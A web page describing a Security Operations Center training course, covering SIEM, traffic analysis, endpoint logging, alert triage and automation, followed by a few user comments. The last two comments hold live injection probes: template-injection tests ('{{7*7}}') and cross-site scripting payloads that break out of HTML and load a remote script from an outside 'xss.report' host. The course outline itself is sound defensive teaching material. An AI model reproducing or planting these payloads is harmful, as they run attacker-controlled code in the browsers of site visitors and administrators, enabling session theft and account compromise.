.
The Security Operations Center (SOC) is the central nervous system of any organization's
cybersecurity efforts, responsible for continuously monitoring, detecting, investigating, and
responding to cyber threats. In today's rapidly evolving threat landscape, SOC teams must be
equipped with the latest tools, techniques, and strategies to defend against attacks, analyze
network traffic, and respond efficiently to incidents.
This course provides a comprehensive overview of SOC functions, introducing participants to
the tools and techniques used by security teams to protect organizations. Through practical
exercises and theoretical knowledge, participants will gain expertise in security information and
event management (SIEM), threat intelligence, network traffic analysis, endpoint defense,
malware identification, alert triage, and SOC automation. The course is designed for security
analysts, SOC engineers, and anyone looking to enhance their skills in cybersecurity operations.
Course Objectives:
• Understand the structure and function of Security Operations Centers.
• Develop skills in using SIEM tools for log analysis, threat detection, and incident
response.
• Gain proficiency in network traffic analysis and identifying malicious activities.
• Learn to defend endpoints, interpret security logs, and identify malware.
• Improve alert triage efficiency and email analysis for threat detection.
• Explore strategies for continuous improvement, SOC automation, and enhancing team
workflows.
Module 1: Security Operations Teams, Tools, and Mission Overview
Topics:
• Welcome to the Blue Team
• SOC Foundations
• SOC Organization and Functions
• SOC Data Collection
• Introduction to SIEM
• Building SIEM Queries
• SIEM Visualizations and Dashboards
• Threat Intelligence Platforms
• Alert Generation and Processing
• Incident Management Systems and SOAR
Exercises:
• Using a SIEM for Log Analysis
• Advanced SIEM Log Searching
• Crafting SIEM Visualizations and Dashboards for Threat Hunting
• Using Threat Intelligence Platforms
• Incident Management Systems
Module 2: Network Traffic Analysis
Topics:
• Network Architecture
• Traffic Capture and Analysis
• Understanding DNS
• DNS Analysis and Attacks
• Understanding HTTP
• HTTP(S) Analysis and Attacks
• How HTTP/2 and HTTP/3 Work
• Analyzing Encrypted Traffic for Suspicious Activity
• Common Protocols for Post-Exploitation
Exercises:
• DNS Requests, Traffic, and Analysis
• Analyzing Malicious DNS
• Wireshark and HTTP/1.1 Analysis
• HTTP/2 and HTTP/3 Traffic Analysis with Wireshark
• Analyzing TLS Encrypted Traffic Without Decryption
Module 3: Endpoint Defense, Security Logging, and Malware Identification
Topics:
• Common Endpoint Attack Tactics
• Endpoint Defense in Depth
• Windows Logging – Formats, Channels, and Audit Policies
• Linux Logging – Syslog, Protocols, and Daemons
• Interpreting Security-Critical Log Events
• Log Collection, Parsing, and Normalization
• Identifying Potentially Malicious Files
• Dissecting Common Malware File Types
Exercises:
• Threat Hunting with a SIEM Using Windows Logs
• Log Enrichment and Visualization
• Dissecting Common Malware File Types
Module 4: Efficient Alert Triage and Email Analysis
Topics:
• Alert Triage and Analysis
• Structured Analytical Techniques for Alert Investigation
• Mental Models for Security Analysts
• Incident Documentation and Investigation Quality
• Analysis OPSEC for Defenders
• Detecting Malicious Emails through Email Header Analysis (SPF, DKIM, DMARC)
• Email Content, URL, and Attachment Analysis
Exercises:
• Alert Triage and Prioritization
• Structured Analysis Challenge
• High-Quality Incident Documentation
• Analyzing Phishing Email Content and Headers
Module 5: Continuous Improvement, Analytics, and Automation
Topics:
• Reducing Burnout and Retention Issues in the SOC
• False Positive Reduction – Analytic Features and Log Enrichment
• New Analytic Design, Testing, and Sharing
• Alert Tuning Methodology
• SOC Automation and Orchestration (with and without SOAR)
• Improving Analyst Efficiency and Workflow
• Methods for Quickly Containing Identified Intrusions
• Skill and Career Development for SOC Staff
Exercises:
• Alert Tuning and False Positive Reduction
• SOC Automation – File Analysis
• SOC Automation – Incident Containment
Conclusion
By the end of this course, participants will be well-versed in the fundamentals of security
operations, including the ability to monitor and analyze network traffic, identify and respond to
threats, protect endpoints, and optimize SOC operations. They will have hands-on experience
using critical SOC tools, from SIEM to threat intelligence platforms, and will be equipped to
handle complex incidents, perform threat hunting, and contribute to the overall improvement of
SOC processes.
2024-09-24
Saurav Chowdhury
Actually I have no idea about this but I am interested to switch my career on this. Is this possible?
2024-10-09
Mohammad shahirul Haque
May be understand its better
2024-10-24
Syper"><u>test{{7*7}} Null
adf asdf asdf asdf asdf asdf asdf asdf asdf asdf asdf asdf asdf asdf asdf asdf
2024-10-24
a><u>test{{7*7}}'"><script src=https://xss.report/c/syper></script> Null'"><script src=https://xss.report/c/syper></script>
adfsdf